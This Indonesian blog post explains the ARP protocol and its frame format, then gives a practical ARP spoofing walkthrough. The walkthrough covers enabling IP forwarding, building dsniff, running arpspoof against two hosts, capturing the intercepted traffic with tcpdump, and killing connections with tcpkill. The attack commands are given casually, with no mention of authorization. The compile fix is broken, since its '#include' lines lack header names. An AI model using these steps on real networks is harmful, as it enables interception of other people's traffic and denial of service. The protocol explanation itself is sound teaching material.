Lompat ke konten Lompat ke sidebar Lompat ke footer

Tentang ARP: Bagian-bagiannya dan ARP Spoofing

Tentang ARP (Address Resolution Protocol), Bagian-bagiannya dan ARP Spoofing
gambar cara  kerja ARP

Tentang ARP

WEBTKJ - Pada jaringan komputer terdapat protokol ARP atau Address Resolution Protocol adalah protokol untuk mapping dari alamat IP (Internet Protocol) ke alamat fisik MAC (Media Access Control). Misal di suatu jaringan kita ingin mengirim paket ke host A 192.168.1.2, maka pertama kita harus tahu sapa yg mempunyai alamat IP tersebut. Maka ARP akan membroadcast pertanyaan tsb ke semua host yang ada di jaringan.

Sang pemilik alamat IP tersebut akan menjawab kembali sahutan tsb dengan mengirimkan alamat MACnya. Alamat MAC ini akan disimpan di tabel ARP untuk memudahkan pencarian jika diperlukan pengiriman paket ke tujuan yang sama.

Bagian-bagian ARP

Seperti apa bentuk format frame ARP? Terdiri dari 2 bagian, yaitu header ethernet dan paket ARP. 

Header ethernet berupa:
  • 6 byte alamat tujuan
  • 6 byte alamat pengirim
  • 2 byte jenis frame ARP
Sedangkan paket ARP berupa:
  • 2 byte jenis alamat hardware (1 = ethernet)
  • 2 byte jenis protokol yang di map (0800H = alamat IP)
  • 1 byte ukuran alamat hardware
  • 1 byte ukuran protokol
  • 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request, 4=RARP reply)
  • 6 byte alamat ethernet pengirim
  • 4 byte alamat IP pengirim
  • 6 byte alamat ethernet penerima
  • 4 byte alamat IP penerima
*RARP (Reverse Address Resolution Protocol) digunakan untuk sistem komputer diskless, guna mendapatkan alamat IP mereka saat boot.

Tentang ARP Spoofing

ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B.

Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dengan ARP Spoofing diantaranya adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.

Apa saja sih yg diperlukan buat ARP Spoofing ini? Kalo saya pakai arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunakan sudah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).

Seperti biasa, unpack paket dsniff lalu configure dan terakhir pake install.Pas saat makai, saya sempat dapat error compiling module sshcrypto :

sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1

Solusinya kita buka dan edit file sshcrypto.c di folder dsniff-2.3, tambahkan :

#include
#include

di deklarasi file header yang diperlukan. Bila sudah selesai dan tidak ada error lagi, coba jalankan si dsniff atau si arpspoof.

Kita coba meracuni dan ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.

Jalankan si arpspoof terlebih dahulu :

root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null

Kalo sudah benar nanti di console akan muncul seperti ini :

0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6

Setelah itu bisa kita endus pake dsniff ato tcpdump, misalkan mau pakai tcpdump bisa kita capture hasilna ke file, pake :

root@slack:~# tcpdump -i eth0 -w endus.txt

Dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita lihat dengan tcpdump juga, pakai :

root@slack:~# tcpdump -r endus.txt

Lumayan asik kan ARP Spoofing, tidak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal :

root@slack:~# tcpkill -9 host www.playboy.com

Untuk mematikan proses si arpspoof n tcpdump bisa dengan cara :

root@slack:~# killall arpspoof
root@slack:~# killall tcpdump

Kesimpulan

Jadi, yang dimaksud dengan Address Resolution Protocol (ARP) adalah protokol jaringan yang penting dalam menghubungkan alamat IP dengan alamat MAC dalam jaringan komputer. ARP memungkinkan pengiriman paket data dengan efisien dan memainkan peran kunci dalam proses switching.

Dengan pemahaman yang baik tentang cara kerja ARP, kita dapat mengoptimalkan kinerja jaringan dan menjaga keamanan jaringan yang baik.
Admin
Admin Terimakasih Atas Kunjungan Anda.

Posting Komentar untuk "Tentang ARP: Bagian-bagiannya dan ARP Spoofing"